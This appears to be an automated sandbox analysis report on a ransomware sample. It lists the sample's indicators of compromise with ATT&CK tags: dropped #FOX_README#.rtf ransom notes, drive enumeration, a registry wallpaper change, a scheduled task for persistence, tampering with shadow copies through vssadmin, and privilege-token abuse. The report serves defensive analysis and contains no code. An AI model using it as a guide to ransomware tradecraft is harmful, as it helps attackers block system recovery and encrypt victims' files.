File opened for modification	C:\Program Files (x86)\desktop.ini	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\desktop.ini	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\$Recycle.Bin\S-1-5-21-1168293393-3419776239-306423207-1000\desktop.ini	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Users\Admin\Pictures\Camera Roll\desktop.ini	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Users\Public\Desktop\desktop.ini	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Users\Admin\3D Objects\desktop.ini	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Users\Public\AccountPictures\desktop.ini	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Users\Public\Videos\desktop.ini	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	F:\$RECYCLE.BIN\S-1-5-21-1168293393-3419776239-306423207-1000\desktop.ini	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Users\Public\Libraries\desktop.ini	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Users\Public\desktop.ini	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Users\Public\Downloads\desktop.ini	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Users\Admin\OneDrive\desktop.ini	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Users\Admin\Pictures\Saved Pictures\desktop.ini	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Users\Admin\Links\desktop.ini	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Users\Public\Documents\desktop.ini	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe

Enumerates connected drives 3 TTPs 44 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exeHPTbJaR964.exe

description	ioc	process
File opened (read-only)	\??\E:	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened (read-only)	\??\Z:	HPTbJaR964.exe
File opened (read-only)	\??\V:	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened (read-only)	\??\S:	HPTbJaR964.exe
File opened (read-only)	\??\Y:	HPTbJaR964.exe
File opened (read-only)	\??\G:	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened (read-only)	\??\X:	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened (read-only)	\??\H:	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened (read-only)	\??\G:	HPTbJaR964.exe
File opened (read-only)	\??\Y:	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened (read-only)	\??\M:	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened (read-only)	\??\J:	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened (read-only)	\??\A:	HPTbJaR964.exe
File opened (read-only)	\??\M:	HPTbJaR964.exe
File opened (read-only)	\??\U:	HPTbJaR964.exe
File opened (read-only)	\??\X:	HPTbJaR964.exe
File opened (read-only)	\??\O:	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened (read-only)	\??\U:	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened (read-only)	\??\T:	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened (read-only)	\??\K:	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened (read-only)	\??\B:	HPTbJaR964.exe
File opened (read-only)	\??\J:	HPTbJaR964.exe
File opened (read-only)	\??\K:	HPTbJaR964.exe
File opened (read-only)	\??\P:	HPTbJaR964.exe
File opened (read-only)	\??\W:	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened (read-only)	\??\Q:	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened (read-only)	\??\L:	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened (read-only)	\??\H:	HPTbJaR964.exe
File opened (read-only)	\??\Q:	HPTbJaR964.exe
File opened (read-only)	\??\R:	HPTbJaR964.exe
File opened (read-only)	\??\R:	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened (read-only)	\??\S:	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened (read-only)	\??\N:	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened (read-only)	\??\I:	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened (read-only)	\??\E:	HPTbJaR964.exe
File opened (read-only)	\??\I:	HPTbJaR964.exe
File opened (read-only)	\??\L:	HPTbJaR964.exe
File opened (read-only)	\??\N:	HPTbJaR964.exe
File opened (read-only)	\??\Z:	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened (read-only)	\??\V:	HPTbJaR964.exe
File opened (read-only)	\??\W:	HPTbJaR964.exe
File opened (read-only)	\??\T:	HPTbJaR964.exe
File opened (read-only)	\??\O:	HPTbJaR964.exe
File opened (read-only)	\??\P:	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

147 myexternalip.com

flow	ioc
147	myexternalip.com

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\MyZplpC7.bmp"	reg.exe

Drops file in Program Files directory 64 IoCs

Processes:

91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe

description	ioc	process
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\OneNoteR_Retail-ppd.xrm-ms	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\VBAJET32.DLL	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\de\Microsoft.Build.Engine.resources.dll	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_sortedby_up_selected_18.svg	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\cstm_brand_preview2x.png	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\ja-jp\AppStore_icon.svg	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Trust Protection Lists\Sigma\Staging.DATA	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\QuickStyles\linessimple.dotx	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\lib\fonts\LucidaTypewriterBold.ttf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Microsoft Office\root\Integration\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Document Themes 16\Wisp.thmx	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.DataIntegration.FuzzyMatching.dll	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\fi-fi\ui-strings.js	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\Heartbeat\HeartbeatCache.xml	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\hr-hr\ui-strings.js	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\LibCurl64.DllA\OpenSSL64.DllA\libcrypto-1_1-x64.dll	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\sk-sk\ui-strings.js	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\plugin.js	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\Download\{F3C4FE00-EFD5-403B-9569-398A20F1BA4A}\1.3.181.5\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.25\System.Diagnostics.DiagnosticSource.dll	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProPlusVL_MAK-ul-oob.xrm-ms	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_filter-focus_32.svg	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\1033\VVIEWRES.DLL	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\dotnet\LICENSE.txt	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Google\Chrome\Application\106.0.5249.119\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\PersonalR_OEM_Perp-pl.xrm-ms	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\Fonts\private\SEGOEUISL.TTF	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_filterselected-default_32.svg	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.151\goopdateres_mr.dll	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\sv-se\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\dcpr.dll	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Java\jdk-1.8\jre\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ucrtbase.dll	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\EXPEDITN\EXPEDITN.ELM	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\root\ui-strings.js	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\lib\security\policy\limited\local_policy.jar	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\vk_swiftshader.dll	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\ja-jp\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\fr-fr\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.25\System.ObjectModel.dll	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\te.pak	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019VL_MAK_AE-ul-oob.xrm-ms	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\MSO0127.ACL	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\manifest.json	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\zh-TW.pak.DATA	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\sk-sk\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ja-jp\ui-strings.js	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\it\Microsoft.Build.Engine.resources.dll	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ko-kr\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\root\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected]	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_OEM_Perp-ul-phn.xrm-ms	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Standard2019VL_MAK_AE-ppd.xrm-ms	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\audio_filter\libstereo_widen_plugin.dll	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\access\libudp_plugin.dll	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\nl-nl\ui-strings.js	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\example_icons2x.png	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\7-Zip\Lang\da.txt	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\7-Zip\7-zip.chm	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SKY\PREVIEW.GIF	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\it\System.Data.Linq.Resources.dll	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\es-es\ui-strings.js	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\uk-ua\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

7008 schtasks.exe
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

9372 vssadmin.exe

pid	process
7008	schtasks.exe

pid	process
9372	vssadmin.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

Processes:

powershell.exeHPTbJaR964.exe

pid	process
5264	powershell.exe
5264	powershell.exe
6812	HPTbJaR964.exe
6812	HPTbJaR964.exe
6812	HPTbJaR964.exe
6812	HPTbJaR964.exe
6812	HPTbJaR964.exe
6812	HPTbJaR964.exe
6812	HPTbJaR964.exe
6812	HPTbJaR964.exe
6812	HPTbJaR964.exe
6812	HPTbJaR964.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

HPTbJaR964.exe

pid process

6812 HPTbJaR964.exe

pid	process
6812	HPTbJaR964.exe

Suspicious use of AdjustPrivilegeToken 49 IoCs

Processes:

powershell.exetakeown.exeHPTbJaR964.exevssvc.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	5264	powershell.exe
Token: SeTakeOwnershipPrivilege	10140	takeown.exe
Token: SeDebugPrivilege	6812	HPTbJaR964.exe
Token: SeLoadDriverPrivilege	6812	HPTbJaR964.exe
Token: SeBackupPrivilege	7596	vssvc.exe
Token: SeRestorePrivilege	7596	vssvc.exe
Token: SeAuditPrivilege	7596	vssvc.exe
Token: SeIncreaseQuotaPrivilege	9712	WMIC.exe
Token: SeSecurityPrivilege	9712	WMIC.exe
Token: SeTakeOwnershipPrivilege	9712	WMIC.exe
Token: SeLoadDriverPrivilege	9712	WMIC.exe
Token: SeSystemProfilePrivilege	9712	WMIC.exe
Token: SeSystemtimePrivilege	9712	WMIC.exe
Token: SeProfSingleProcessPrivilege	9712	WMIC.exe
Token: SeIncBasePriorityPrivilege	9712	WMIC.exe
Token: SeCreatePagefilePrivilege	9712	WMIC.exe
Token: SeBackupPrivilege	9712	WMIC.exe
Token: SeRestorePrivilege	9712	WMIC.exe
Token: SeShutdownPrivilege	9712	WMIC.exe
Token: SeDebugPrivilege	9712	WMIC.exe
Token: SeSystemEnvironmentPrivilege	9712	WMIC.exe
Token: SeRemoteShutdownPrivilege	9712	WMIC.exe
Token: SeUndockPrivilege	9712	WMIC.exe
Token: SeManageVolumePrivilege	9712	WMIC.exe
Token: 33	9712	WMIC.exe
Token: 34	9712	WMIC.exe
Token: 35	9712	WMIC.exe
Token: 36	9712	WMIC.exe
Token: SeIncreaseQuotaPrivilege	9712	WMIC.exe
Token: SeSecurityPrivilege	9712	WMIC.exe
Token: SeTakeOwnershipPrivilege	9712	WMIC.exe
Token: SeLoadDriverPrivilege	9712	WMIC.exe
Token: SeSystemProfilePrivilege	9712	WMIC.exe
Token: SeSystemtimePrivilege	9712	WMIC.exe
Token: SeProfSingleProcessPrivilege	9712	WMIC.exe
Token: SeIncBasePriorityPrivilege	9712	WMIC.exe
Token: SeCreatePagefilePrivilege	9712	WMIC.exe
Token: SeBackupPrivilege	9712	WMIC.exe
Token: SeRestorePrivilege	9712	WMIC.exe
Token: SeShutdownPrivilege	9712	WMIC.exe
Token: SeDebugPrivilege	9712	WMIC.exe
Token: SeSystemEnvironmentPrivilege	9712	WMIC.exe
Token: SeRemoteShutdownPrivilege	9712	WMIC.exe
Token: SeUndockPrivilege	9712	WMIC.exe
Token: SeManageVolumePrivilege	9712	WMIC.exe
Token: 33	9712	WMIC.exe
Token: 34	9712	WMIC.exe
Token: 35	9712	WMIC.exe
Token: 36	9712	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.execmd.execmd.execmd.execmd.exewscript.execmd.execmd.execmd.exeHPTbJaR9.execmd.exe

description	pid	process	target process
PID 756 wrote to memory of 4900	756	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe	cmd.exe
PID 756 wrote to memory of 4900	756	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe	cmd.exe
PID 756 wrote to memory of 4900	756	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe	cmd.exe
PID 756 wrote to memory of 3528	756	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe	NWqByALz.exe
PID 756 wrote to memory of 3528	756	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe	NWqByALz.exe
PID 756 wrote to memory of 3528	756	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe	NWqByALz.exe
PID 756 wrote to memory of 1260	756	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe	cmd.exe
PID 756 wrote to memory of 1260	756	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe	cmd.exe
PID 756 wrote to memory of 1260	756	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe	cmd.exe
PID 1260 wrote to memory of 5264	1260	cmd.exe	powershell.exe
PID 1260 wrote to memory of 5264	1260	cmd.exe	powershell.exe
PID 1260 wrote to memory of 5264	1260	cmd.exe	powershell.exe
PID 756 wrote to memory of 5688	756	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe	cmd.exe
PID 756 wrote to memory of 5688	756	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe	cmd.exe
